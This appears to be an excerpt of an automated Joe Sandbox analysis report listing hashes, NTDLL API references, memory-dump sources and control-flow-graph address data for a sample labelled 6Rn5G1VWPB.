                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 97fb8d5e75575405fda22c6a33fddb850ed316db446087bc0a55f43dd52bdf9f
                                  • Instruction ID: f854427b133ac5f34f93265145678e24979070da7e2dcf922e36fbd16c094705
                                  • Opcode Fuzzy Hash: 97fb8d5e75575405fda22c6a33fddb850ed316db446087bc0a55f43dd52bdf9f
                                  • Instruction Fuzzy Hash: 871215B4A04228CFCB64EF64C85879DB7F6AF88205F5085E9E909A3750DF349E85CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: b99a88e4ffaf9cb05eaf1fe689b6921a4d5eae2bee969f307caefc3ab100eb73
                                  • Instruction ID: 7f356d83a90279b05b18cbbc91c420c75404573fcdfd4e3134bee6934c7b5ee3
                                  • Opcode Fuzzy Hash: b99a88e4ffaf9cb05eaf1fe689b6921a4d5eae2bee969f307caefc3ab100eb73
                                  • Instruction Fuzzy Hash: 251215B4A04228CFCB64EF64C85879DB7B6AF88205F5085E9E909A3750DF349E85CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: fada91a38a8f2f2e043d6d63b62676dfeee73123a39a644fa606400cff5f8570
                                  • Instruction ID: de8702e9e204c8a90820e6b5b4753c7555cf70ca23b63633eb7a59acbcc2041d
                                  • Opcode Fuzzy Hash: fada91a38a8f2f2e043d6d63b62676dfeee73123a39a644fa606400cff5f8570
                                  • Instruction Fuzzy Hash: 521205B4A04228CFCB64EF64C85879DB7F6AF88205F5085E9E909A3750DF349E85CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 3c6f4bf43db8dcd84b7c817bc531072236050439238350c76987d6f488b67dc1
                                  • Instruction ID: ba4c2c7e7929f513ea9973ee004a939adc4228cbdb857c2bea1ef8a1713671f3
                                  • Opcode Fuzzy Hash: 3c6f4bf43db8dcd84b7c817bc531072236050439238350c76987d6f488b67dc1
                                  • Instruction Fuzzy Hash: 071205B4A04228CFCB64EF64C85879DB7F6AF88205F5085E9E909A3750DF349E85CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 13995 10d1299-10d12b0 13997 10d12bb-10d12c0 13995->13997 14291 10d12c0 call 10c93e0 13997->14291 14292 10d12c0 call 10c93f0 13997->14292 13999 10d12c6-10d12d8 14000 10d12df-10d1308 13999->14000 14002 10d130e-10d1320 14000->14002 14003 10d1327-10d1350 call 10c9e98 14002->14003 14005 10d1356-10d137e 14003->14005 14007 10d1385-10d13ae 14005->14007 14009 10d13b4-10d13c6 14007->14009 14010 10d13cd-10d13f6 14009->14010 14265 10d13f6 call 10cabcf 14010->14265 14266 10d13f6 call 10cab97 14010->14266 14012 10d13fc-10d140e 14013 10d1415-10d143e 14012->14013 14269 10d143e call 10cac89 14013->14269 14270 10d143e call 10cac90 14013->14270 14015 10d1444-10d1456 14016 10d145d-10d1486 14015->14016 14018 10d148c-10d149e 14016->14018 14019 10d14a5-10d14ce 14018->14019 14021 10d14d4-10d14e6 14019->14021 14022 10d14ed-10d1516 14021->14022 14278 10d1516 call 10cbdb8 14022->14278 14279 10d1516 call 10cbda7 14022->14279 14024 10d151c-10d152e 14025 10d1535-10d155e 14024->14025 14280 10d155e call 10cc2de 14025->14280 14281 10d155e call 10cc338 14025->14281 14282 10d155e call 10cc388 14025->14282 14283 10d155e call 10cc3d8 14025->14283 14284 10d155e call 10cbdb8 14025->14284 14285 10d155e call 10cc044 14025->14285 14286 10d155e call 10cbda7 14025->14286 14287 10d155e call 10cc380 14025->14287 14027 10d1564-10d1576 14028 10d157d-10d15a6 14027->14028 14030 10d15ac-10d1608 14028->14030 14036 10d1613-10d1619 14030->14036 14293 10d161f call 10cdd5d 14036->14293 14294 10d161f call 10cdc38 14036->14294 14295 10d161f call 10cdc88 14036->14295 14296 10d161f call 10cdbe0 14036->14296 14297 10d161f call 10cdbf0 14036->14297 14037 10d1625-10d163c 14040 10d1647 14037->14040 14298 10d1649 call 10cde28 14040->14298 14299 10d1649 call 10cde20 14040->14299 14041 10d164f-10d166a 14044 10d1675 14041->14044 14301 10d1677 call 10cde28 14044->14301 14302 10d1677 call 10cde20 14044->14302 14045 10d167d-10d1698 14048 10d16a3 14045->14048 14267 10d16a5 call 10cde28 14048->14267 14268 10d16a5 call 10cde20 14048->14268 14049 10d16ab-10d16c6 14052 10d16d1 14049->14052 14271 10d16d3 call 10cde28 14052->14271 14272 10d16d3 call 10cde20 14052->14272 14053 10d16d9-10d16f4 14056 10d16ff 14053->14056 14276 10d1701 call 10cde28 14056->14276 14277 10d1701 call 10cde20 14056->14277 14057 10d1707-10d1773 LdrInitializeThunk 14058 10d1a8d 14057->14058 14059 10d1779-10d179d 14057->14059 14060 10d1a93-10d1aa5 14058->14060 14064 10d18ee-10d1912 14059->14064 14065 10d17a3 14059->14065 14063 10d1aac-10d1ad5 call 10ced1f 14060->14063 14069 10d1adb-10d1aed 14063->14069 14075 10d1918-10d191a 14064->14075 14076 10d1914 14064->14076 14065->14064 14067 10d17a9-10d18e2 14065->14067 14224 10d18e9 14067->14224 14072 10d1af4-10d1b1d 14069->14072 14080 10d1b23-10d1b35 14072->14080 14079 10d1921-10d194b 14075->14079 14077 10d191c 14076->14077 14078 10d1916 14076->14078 14077->14079 14078->14075 14087 10d194d 14079->14087 14088 10d1951-10d1953 14079->14088 14083 10d1b3c-10d1ba1 KiUserExceptionDispatcher 14080->14083 14273 10d1ba1 call 10cf41f 14083->14273 14274 10d1ba1 call 10cf368 14083->14274 14275 10d1ba1 call 10cf370 14083->14275 14090 10d194f 14087->14090 14091 10d1955 14087->14091 14092 10d195a-10d1960 14088->14092 14090->14088 14091->14092 14092->14058 14095 10d1966-10d1a59 14092->14095 14221 10d1a64 14095->14221 14098 10d1ba7-10d1bf3 14105 10d1edf-10d1ef0 14098->14105 14106 10d1bf9-10d1c1c 14098->14106 14112 10d2255-10d225c 14105->14112 14113 10d1ef6-10d1efd 14105->14113 14121 10d1ec7-10d1edc 14106->14121 14122 10d1c22-10d1c94 14106->14122 14116 10d22de-10d22e8 14112->14116 14117 10d2262-10d22d3 14112->14117 14119 10d1f94-10d1f9b 14113->14119 14120 10d1f03-10d1f09 14113->14120 14123 10d232e-10d2340 14116->14123 14124 10d22ea-10d2318 14116->14124 14117->14116 14125 10d210b-10d2112 14119->14125 14126 10d1fa1-10d20e6 14119->14126 14138 10d1f11 14120->14138 14139 10d1edd 14121->14139 14165 10d1eaf-10d1ec1 14122->14165 14166 10d1c9a-10d1ca1 14122->14166 14161 10d231f-10d2327 14124->14161 14125->14112 14132 10d2118-10d2238 14125->14132 14126->14112 14132->14112 14288 10d1f17 call 10cf788 14138->14288 14289 10d1f17 call 10cf787 14138->14289 14139->14139 14147 10d1f1d-10d1f3c 14164 10d1f47-10d1f57 14147->14164 14161->14123 14175 10d1f63 14164->14175 14165->14121 14165->14122 14170 10d1ca7-10d1dad 14166->14170 14171 10d1db2-10d1ddd 14166->14171 14170->14165 14171->14165 14176 10d1de3-10d1e86 14171->14176 14175->14112 14176->14165 14221->14058 14224->14058 14265->14012 14266->14012 14267->14049 14268->14049 14269->14015 14270->14015 14271->14053 14272->14053 14273->14098 14274->14098 14275->14098 14276->14057 14277->14057 14278->14024 14279->14024 14280->14027 14281->14027 14282->14027 14283->14027 14284->14027 14285->14027 14286->14027 14287->14027 14288->14147 14289->14147 14291->13999 14292->13999 14293->14037 14294->14037 14295->14037 14296->14037 14297->14037 14298->14041 14299->14041 14301->14045 14302->14045
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 323ed7db9825a9dcb29c99fa8cc593d492e2262df7cc3121db4e5494c6f22237
                                  • Instruction ID: 3c102c897ff364c8350aafbed001eab1bb95856894b2511717956b9cfad9f490
                                  • Opcode Fuzzy Hash: 323ed7db9825a9dcb29c99fa8cc593d492e2262df7cc3121db4e5494c6f22237
                                  • Instruction Fuzzy Hash: E21205B4A04228CFCB64EB74C85879DB7F6AF88205F5085E9E909A3750DF349E85CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14303 10d12e1-10d12f8 14305 10d1303-10d1308 14303->14305 14307 10d130e-10d1320 14305->14307 14308 10d1327-10d1350 call 10c9e98 14307->14308 14310 10d1356-10d137e 14308->14310 14312 10d1385-10d13ae 14310->14312 14314 10d13b4-10d13c6 14312->14314 14315 10d13cd-10d13f6 14314->14315 14572 10d13f6 call 10cabcf 14315->14572 14573 10d13f6 call 10cab97 14315->14573 14317 10d13fc-10d140e 14318 10d1415-10d143e 14317->14318 14576 10d143e call 10cac89 14318->14576 14577 10d143e call 10cac90 14318->14577 14320 10d1444-10d1456 14321 10d145d-10d1486 14320->14321 14323 10d148c-10d149e 14321->14323 14324 10d14a5-10d14ce 14323->14324 14326 10d14d4-10d14e6 14324->14326 14327 10d14ed-10d1516 14326->14327 14585 10d1516 call 10cbdb8 14327->14585 14586 10d1516 call 10cbda7 14327->14586 14329 10d151c-10d152e 14330 10d1535-10d155e 14329->14330 14587 10d155e call 10cc2de 14330->14587 14588 10d155e call 10cc338 14330->14588 14589 10d155e call 10cc388 14330->14589 14590 10d155e call 10cc3d8 14330->14590 14591 10d155e call 10cbdb8 14330->14591 14592 10d155e call 10cc044 14330->14592 14593 10d155e call 10cbda7 14330->14593 14594 10d155e call 10cc380 14330->14594 14332 10d1564-10d1576 14333 10d157d-10d15a6 14332->14333 14335 10d15ac-10d1608 14333->14335 14341 10d1613-10d1619 14335->14341 14598 10d161f call 10cdd5d 14341->14598 14599 10d161f call 10cdc38 14341->14599 14600 10d161f call 10cdc88 14341->14600 14601 10d161f call 10cdbe0 14341->14601 14602 10d161f call 10cdbf0 14341->14602 14342 10d1625-10d163c 14345 10d1647 14342->14345 14603 10d1649 call 10cde28 14345->14603 14604 10d1649 call 10cde20 14345->14604 14346 10d164f-10d166a 14349 10d1675 14346->14349 14570 10d1677 call 10cde28 14349->14570 14571 10d1677 call 10cde20 14349->14571 14350 10d167d-10d1698 14353 10d16a3 14350->14353 14574 10d16a5 call 10cde28 14353->14574 14575 10d16a5 call 10cde20 14353->14575 14354 10d16ab-10d16c6 14357 10d16d1 14354->14357 14578 10d16d3 call 10cde28 14357->14578 14579 10d16d3 call 10cde20 14357->14579 14358 10d16d9-10d16f4 14361 10d16ff 14358->14361 14583 10d1701 call 10cde28 14361->14583 14584 10d1701 call 10cde20 14361->14584 14362 10d1707-10d1773 LdrInitializeThunk 14363 10d1a8d 14362->14363 14364 10d1779-10d179d 14362->14364 14365 10d1a93-10d1aa5 14363->14365 14369 10d18ee-10d1912 14364->14369 14370 10d17a3 14364->14370 14368 10d1aac-10d1ad5 call 10ced1f 14365->14368 14374 10d1adb-10d1aed 14368->14374 14380 10d1918-10d191a 14369->14380 14381 10d1914 14369->14381 14370->14369 14372 10d17a9-10d18e2 14370->14372 14529 10d18e9 14372->14529 14377 10d1af4-10d1b1d 14374->14377 14385 10d1b23-10d1b35 14377->14385 14384 10d1921-10d194b 14380->14384 14382 10d191c 14381->14382 14383 10d1916 14381->14383 14382->14384 14383->14380 14392 10d194d 14384->14392 14393 10d1951-10d1953 14384->14393 14388 10d1b3c-10d1ba1 KiUserExceptionDispatcher 14385->14388 14580 10d1ba1 call 10cf41f 14388->14580 14581 10d1ba1 call 10cf368 14388->14581 14582 10d1ba1 call 10cf370 14388->14582 14395 10d194f 14392->14395 14396 10d1955 14392->14396 14397 10d195a-10d1960 14393->14397 14395->14393 14396->14397 14397->14363 14400 10d1966-10d1a59 14397->14400 14526 10d1a64 14400->14526 14403 10d1ba7-10d1bf3 14410 10d1edf-10d1ef0 14403->14410 14411 10d1bf9-10d1c1c 14403->14411 14417 10d2255-10d225c 14410->14417 14418 10d1ef6-10d1efd 14410->14418 14426 10d1ec7-10d1edc 14411->14426 14427 10d1c22-10d1c94 14411->14427 14421 10d22de-10d22e8 14417->14421 14422 10d2262-10d22d3 14417->14422 14424 10d1f94-10d1f9b 14418->14424 14425 10d1f03-10d1f09 14418->14425 14428 10d232e-10d2340 14421->14428 14429 10d22ea-10d2318 14421->14429 14422->14421 14430 10d210b-10d2112 14424->14430 14431 10d1fa1-10d20e6 14424->14431 14443 10d1f11 14425->14443 14444 10d1edd 14426->14444 14470 10d1eaf-10d1ec1 14427->14470 14471 10d1c9a-10d1ca1 14427->14471 14466 10d231f-10d2327 14429->14466 14430->14417 14437 10d2118-10d2238 14430->14437 14431->14417 14437->14417 14595 10d1f17 call 10cf788 14443->14595 14596 10d1f17 call 10cf787 14443->14596 14444->14444 14452 10d1f1d-10d1f3c 14469 10d1f47-10d1f57 14452->14469 14466->14428 14480 10d1f63 14469->14480 14470->14426 14470->14427 14475 10d1ca7-10d1dad 14471->14475 14476 10d1db2-10d1ddd 14471->14476 14475->14470 14476->14470 14481 10d1de3-10d1e86 14476->14481 14480->14417 14481->14470 14526->14363 14529->14363 14570->14350 14571->14350 14572->14317 14573->14317 14574->14354 14575->14354 14576->14320 14577->14320 14578->14358 14579->14358 14580->14403 14581->14403 14582->14403 14583->14362 14584->14362 14585->14329 14586->14329 14587->14332 14588->14332 14589->14332 14590->14332 14591->14332 14592->14332 14593->14332 14594->14332 14595->14452 14596->14452 14598->14342 14599->14342 14600->14342 14601->14342 14602->14342 14603->14346 14604->14346
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: ebbb76bb8b19a7770702a4dbdc2dc884f4ea844093ec970232aae89a45db5fc4
                                  • Instruction ID: 5f3a19112da54110f14fb0f9d7f998d55d5731c9a1af183e448d42b35bc9e979
                                  • Opcode Fuzzy Hash: ebbb76bb8b19a7770702a4dbdc2dc884f4ea844093ec970232aae89a45db5fc4
                                  • Instruction Fuzzy Hash: 980206B4A04228CFCB64EB74C85879DB7F6AF88205F5085E9E909A3750DF349E85CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14606 10d1329-10d1340 14608 10d134b-10d1350 call 10c9e98 14606->14608 14610 10d1356-10d137e 14608->14610 14612 10d1385-10d13ae 14610->14612 14614 10d13b4-10d13c6 14612->14614 14615 10d13cd-10d13f6 14614->14615 14883 10d13f6 call 10cabcf 14615->14883 14884 10d13f6 call 10cab97 14615->14884 14617 10d13fc-10d140e 14618 10d1415-10d143e 14617->14618 14887 10d143e call 10cac89 14618->14887 14888 10d143e call 10cac90 14618->14888 14620 10d1444-10d1456 14621 10d145d-10d1486 14620->14621 14623 10d148c-10d149e 14621->14623 14624 10d14a5-10d14ce 14623->14624 14626 10d14d4-10d14e6 14624->14626 14627 10d14ed-10d1516 14626->14627 14896 10d1516 call 10cbdb8 14627->14896 14897 10d1516 call 10cbda7 14627->14897 14629 10d151c-10d152e 14630 10d1535-10d155e 14629->14630 14898 10d155e call 10cc2de 14630->14898 14899 10d155e call 10cc338 14630->14899 14900 10d155e call 10cc388 14630->14900 14901 10d155e call 10cc3d8 14630->14901 14902 10d155e call 10cbdb8 14630->14902 14903 10d155e call 10cc044 14630->14903 14904 10d155e call 10cbda7 14630->14904 14905 10d155e call 10cc380 14630->14905 14632 10d1564-10d1576 14633 10d157d-10d15a6 14632->14633 14635 10d15ac-10d1608 14633->14635 14641 10d1613-10d1619 14635->14641 14873 10d161f call 10cdd5d 14641->14873 14874 10d161f call 10cdc38 14641->14874 14875 10d161f call 10cdc88 14641->14875 14876 10d161f call 10cdbe0 14641->14876 14877 10d161f call 10cdbf0 14641->14877 14642 10d1625-10d163c 14645 10d1647 14642->14645 14878 10d1649 call 10cde28 14645->14878 14879 10d1649 call 10cde20 14645->14879 14646 10d164f-10d166a 14649 10d1675 14646->14649 14881 10d1677 call 10cde28 14649->14881 14882 10d1677 call 10cde20 14649->14882 14650 10d167d-10d1698 14653 10d16a3 14650->14653 14885 10d16a5 call 10cde28 14653->14885 14886 10d16a5 call 10cde20 14653->14886 14654 10d16ab-10d16c6 14657 10d16d1 14654->14657 14889 10d16d3 call 10cde28 14657->14889 14890 10d16d3 call 10cde20 14657->14890 14658 10d16d9-10d16f4 14661 10d16ff 14658->14661 14894 10d1701 call 10cde28 14661->14894 14895 10d1701 call 10cde20 14661->14895 14662 10d1707-10d1773 LdrInitializeThunk 14663 10d1a8d 14662->14663 14664 10d1779-10d179d 14662->14664 14665 10d1a93-10d1aa5 14663->14665 14669 10d18ee-10d1912 14664->14669 14670 10d17a3 14664->14670 14668 10d1aac-10d1ad5 call 10ced1f 14665->14668 14674 10d1adb-10d1aed 14668->14674 14680 10d1918-10d191a 14669->14680 14681 10d1914 14669->14681 14670->14669 14672 10d17a9-10d18e2 14670->14672 14829 10d18e9 14672->14829 14677 10d1af4-10d1b1d 14674->14677 14685 10d1b23-10d1b35 14677->14685 14684 10d1921-10d194b 14680->14684 14682 10d191c 14681->14682 14683 10d1916 14681->14683 14682->14684 14683->14680 14692 10d194d 14684->14692 14693 10d1951-10d1953 14684->14693 14688 10d1b3c-10d1ba1 KiUserExceptionDispatcher 14685->14688 14891 10d1ba1 call 10cf41f 14688->14891 14892 10d1ba1 call 10cf368 14688->14892 14893 10d1ba1 call 10cf370 14688->14893 14695 10d194f 14692->14695 14696 10d1955 14692->14696 14697 10d195a-10d1960 14693->14697 14695->14693 14696->14697 14697->14663 14700 10d1966-10d1a59 14697->14700 14826 10d1a64 14700->14826 14703 10d1ba7-10d1bf3 14710 10d1edf-10d1ef0 14703->14710 14711 10d1bf9-10d1c1c 14703->14711 14717 10d2255-10d225c 14710->14717 14718 10d1ef6-10d1efd 14710->14718 14726 10d1ec7-10d1edc 14711->14726 14727 10d1c22-10d1c94 14711->14727 14721 10d22de-10d22e8 14717->14721 14722 10d2262-10d22d3 14717->14722 14724 10d1f94-10d1f9b 14718->14724 14725 10d1f03-10d1f09 14718->14725 14728 10d232e-10d2340 14721->14728 14729 10d22ea-10d2318 14721->14729 14722->14721 14730 10d210b-10d2112 14724->14730 14731 10d1fa1-10d20e6 14724->14731 14743 10d1f11 14725->14743 14744 10d1edd 14726->14744 14770 10d1eaf-10d1ec1 14727->14770 14771 10d1c9a-10d1ca1 14727->14771 14766 10d231f-10d2327 14729->14766 14730->14717 14737 10d2118-10d2238 14730->14737 14731->14717 14737->14717 14870 10d1f17 call 10cf788 14743->14870 14871 10d1f17 call 10cf787 14743->14871 14744->14744 14752 10d1f1d-10d1f3c 14769 10d1f47-10d1f57 14752->14769 14766->14728 14780 10d1f63 14769->14780 14770->14726 14770->14727 14775 10d1ca7-10d1dad 14771->14775 14776 10d1db2-10d1ddd 14771->14776 14775->14770 14776->14770 14781 10d1de3-10d1e86 14776->14781 14780->14717 14781->14770 14826->14663 14829->14663 14870->14752 14871->14752 14873->14642 14874->14642 14875->14642 14876->14642 14877->14642 14878->14646 14879->14646 14881->14650 14882->14650 14883->14617 14884->14617 14885->14654 14886->14654 14887->14620 14888->14620 14889->14658 14890->14658 14891->14703 14892->14703 14893->14703 14894->14662 14895->14662 14896->14629 14897->14629 14898->14632 14899->14632 14900->14632 14901->14632 14902->14632 14903->14632 14904->14632 14905->14632
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: b34ec62411c9bea3cd4bf81f5ad94d2efc7ae0ff94f4cb109a85becef84f0f2c
                                  • Instruction ID: 83fe3a26a33b112013e6bbf2cbd8ed8a92da02676dd9e745701b85840dd5011b
                                  • Opcode Fuzzy Hash: b34ec62411c9bea3cd4bf81f5ad94d2efc7ae0ff94f4cb109a85becef84f0f2c
                                  • Instruction Fuzzy Hash: F10217B4A04228CFCB64EB74C85879DB7F6AF88205F5085E9E909A3750DF349E85CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14906 10d1387-10d139e 14908 10d13a9-10d13ae 14906->14908 14910 10d13b4-10d13c6 14908->14910 14911 10d13cd-10d13f6 14910->14911 15168 10d13f6 call 10cabcf 14911->15168 15169 10d13f6 call 10cab97 14911->15169 14913 10d13fc-10d140e 14914 10d1415-10d143e 14913->14914 15172 10d143e call 10cac89 14914->15172 15173 10d143e call 10cac90 14914->15173 14916 10d1444-10d1456 14917 10d145d-10d1486 14916->14917 14919 10d148c-10d149e 14917->14919 14920 10d14a5-10d14ce 14919->14920 14922 10d14d4-10d14e6 14920->14922 14923 10d14ed-10d1516 14922->14923 15181 10d1516 call 10cbdb8 14923->15181 15182 10d1516 call 10cbda7 14923->15182 14925 10d151c-10d152e 14926 10d1535-10d155e 14925->14926 15183 10d155e call 10cc2de 14926->15183 15184 10d155e call 10cc338 14926->15184 15185 10d155e call 10cc388 14926->15185 15186 10d155e call 10cc3d8 14926->15186 15187 10d155e call 10cbdb8 14926->15187 15188 10d155e call 10cc044 14926->15188 15189 10d155e call 10cbda7 14926->15189 15190 10d155e call 10cc380 14926->15190 14928 10d1564-10d1576 14929 10d157d-10d15a6 14928->14929 14931 10d15ac-10d1608 14929->14931 14937 10d1613-10d1619 14931->14937 15194 10d161f call 10cdd5d 14937->15194 15195 10d161f call 10cdc38 14937->15195 15196 10d161f call 10cdc88 14937->15196 15197 10d161f call 10cdbe0 14937->15197 15198 10d161f call 10cdbf0 14937->15198 14938 10d1625-10d163c 14941 10d1647 14938->14941 15199 10d1649 call 10cde28 14941->15199 15200 10d1649 call 10cde20 14941->15200 14942 10d164f-10d166a 14945 10d1675 14942->14945 15166 10d1677 call 10cde28 14945->15166 15167 10d1677 call 10cde20 14945->15167 14946 10d167d-10d1698 14949 10d16a3 14946->14949 15170 10d16a5 call 10cde28 14949->15170 15171 10d16a5 call 10cde20 14949->15171 14950 10d16ab-10d16c6 14953 10d16d1 14950->14953 15174 10d16d3 call 10cde28 14953->15174 15175 10d16d3 call 10cde20 14953->15175 14954 10d16d9-10d16f4 14957 10d16ff 14954->14957 15179 10d1701 call 10cde28 14957->15179 15180 10d1701 call 10cde20 14957->15180 14958 10d1707-10d1773 LdrInitializeThunk 14959 10d1a8d 14958->14959 14960 10d1779-10d179d 14958->14960 14961 10d1a93-10d1aa5 14959->14961 14965 10d18ee-10d1912 14960->14965 14966 10d17a3 14960->14966 14964 10d1aac-10d1ad5 call 10ced1f 14961->14964 14970 10d1adb-10d1aed 14964->14970 14976 10d1918-10d191a 14965->14976 14977 10d1914 14965->14977 14966->14965 14968 10d17a9-10d18e2 14966->14968 15125 10d18e9 14968->15125 14973 10d1af4-10d1b1d 14970->14973 14981 10d1b23-10d1b35 14973->14981 14980 10d1921-10d194b 14976->14980 14978 10d191c 14977->14978 14979 10d1916 14977->14979 14978->14980 14979->14976 14988 10d194d 14980->14988 14989 10d1951-10d1953 14980->14989 14984 10d1b3c-10d1ba1 KiUserExceptionDispatcher 14981->14984 15176 10d1ba1 call 10cf41f 14984->15176 15177 10d1ba1 call 10cf368 14984->15177 15178 10d1ba1 call 10cf370 14984->15178 14991 10d194f 14988->14991 14992 10d1955 14988->14992 14993 10d195a-10d1960 14989->14993 14991->14989 14992->14993 14993->14959 14996 10d1966-10d1a59 14993->14996 15122 10d1a64 14996->15122 14999 10d1ba7-10d1bf3 15006 10d1edf-10d1ef0 14999->15006 15007 10d1bf9-10d1c1c 14999->15007 15013 10d2255-10d225c 15006->15013 15014 10d1ef6-10d1efd 15006->15014 15022 10d1ec7-10d1edc 15007->15022 15023 10d1c22-10d1c94 15007->15023 15017 10d22de-10d22e8 15013->15017 15018 10d2262-10d22d3 15013->15018 15020 10d1f94-10d1f9b 15014->15020 15021 10d1f03-10d1f09 15014->15021 15024 10d232e-10d2340 15017->15024 15025 10d22ea-10d2318 15017->15025 15018->15017 15026 10d210b-10d2112 15020->15026 15027 10d1fa1-10d20e6 15020->15027 15039 10d1f11 15021->15039 15040 10d1edd 15022->15040 15066 10d1eaf-10d1ec1 15023->15066 15067 10d1c9a-10d1ca1 15023->15067 15062 10d231f-10d2327 15025->15062 15026->15013 15033 10d2118-10d2238 15026->15033 15027->15013 15033->15013 15191 10d1f17 call 10cf788 15039->15191 15192 10d1f17 call 10cf787 15039->15192 15040->15040 15048 10d1f1d-10d1f3c 15065 10d1f47-10d1f57 15048->15065 15062->15024 15076 10d1f63 15065->15076 15066->15022 15066->15023 15071 10d1ca7-10d1dad 15067->15071 15072 10d1db2-10d1ddd 15067->15072 15071->15066 15072->15066 15077 10d1de3-10d1e86 15072->15077 15076->15013 15077->15066 15122->14959 15125->14959 15166->14946 15167->14946 15168->14913 15169->14913 15170->14950 15171->14950 15172->14916 15173->14916 15174->14954 15175->14954 15176->14999 15177->14999 15178->14999 15179->14958 15180->14958 15181->14925 15182->14925 15183->14928 15184->14928 15185->14928 15186->14928 15187->14928 15188->14928 15189->14928 15190->14928 15191->15048 15192->15048 15194->14938 15195->14938 15196->14938 15197->14938 15198->14938 15199->14942 15200->14942
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 339cd90f346d82355ecf6b9ee1d53ba7621d1184203185f18f37813a1500df09
                                  • Instruction ID: 888ef5c87d335afdd465013bb732c327c44901d25e79270acbab3315f1685263
                                  • Opcode Fuzzy Hash: 339cd90f346d82355ecf6b9ee1d53ba7621d1184203185f18f37813a1500df09
                                  • Instruction Fuzzy Hash: 510217B4A04228CFCB64EB74C85879DB7F6AF88205F5085E9E909A3790DF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
